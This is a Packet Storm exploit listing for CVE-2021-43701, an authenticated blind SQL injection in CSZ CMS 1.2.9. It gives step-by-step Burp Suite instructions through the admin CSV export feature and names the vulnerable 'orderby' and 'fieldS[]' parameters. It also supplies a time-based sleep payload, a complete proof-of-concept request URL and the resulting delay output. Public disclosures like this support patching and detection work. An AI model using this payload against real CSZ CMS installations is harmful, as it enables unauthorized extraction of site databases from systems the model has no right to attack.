Lucene search
Rahad ChowdhuryPACKETSTORM:166535HistoryMar 30, 2022 - 12:00 a.m.
CSZ CMS 1.2.9 SQL Injection
2022-03-3000:00:00
Rahad Chowdhury
packetstormsecurity.com
201
csz cms
blind sql injection
csv export
burp suite
proof of concept
cve-2021-43701
admin panel
apache 2.4.46
php 7.4.16
windows 10
kali linux
EPSS
0.04
Percentile
92.2%
`# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQL Injection
(Authenticated)
# Date: 2021-04-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.cszcms.com/
# Software Link:
https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
# Version: 1.2.9
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
# CVE: CVE-2021-43701
*Steps to Reproduce:*
1. First login to your Admin Panel
2. then go to "General Menu > CSV Export / Import".
3. open burp site and configure with browser.
4. then select any "Table Name" > Select "Fields Select" and Select "Sort
by"
5. Now click "Export to CSV" and intercept with burp suite
6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject
Blind SQL Injection use this query "(select(0)from(select(sleep(10)))a)" in
"orderby" parameter.
*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV
*Output:*
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds
`
Related
cve
cve
CVE-2021-43701
2022-03-29 16:15:07
prion
prion
Sql injection
2022-03-29 16:15:00
zdt
zdt
CSZ CMS 1.2.9 - Multiple Blind SQL injection (Authenticated) Vulnerability
2022-03-30 00:00:00
cvelist
cvelist
CVE-2021-43701
2022-03-29 15:31:16
nvd
nvd
CVE-2021-43701
2022-03-29 16:15:07
exploitdb
exploitdb
CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
2022-03-30 00:00:00